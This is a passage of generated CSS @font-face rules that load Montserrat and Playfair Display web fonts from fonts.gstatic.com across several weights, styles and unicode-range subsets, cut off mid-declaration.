U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: 